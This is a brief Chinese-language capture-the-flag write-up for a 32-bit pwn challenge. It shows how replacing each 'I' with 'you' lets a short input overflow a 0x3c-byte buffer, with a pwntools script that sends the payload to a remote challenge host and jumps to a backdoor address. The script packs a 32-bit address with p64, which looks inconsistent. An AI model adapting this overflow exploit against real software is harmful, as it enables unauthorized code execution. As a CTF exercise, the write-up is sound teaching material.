首先找到后门
32位IDA 打开
这里fgets,他限定了位数,我们无法利用溢出
但是我们可以看见
最后还有个操作
他把我们里面的I,全部替换为了 you
S大小为0x3c ---意思我们要输入0x3c/3 的I 能达到溢出的目的
再加上4
from pwn import *
ghust = remote("node5.buuoj.cn",26545)
addr = 0x08048F0D
payload = b'I'*20 +b'a'*4+ p64(addr)
ghust.sendline(payload)
ghust.interactive()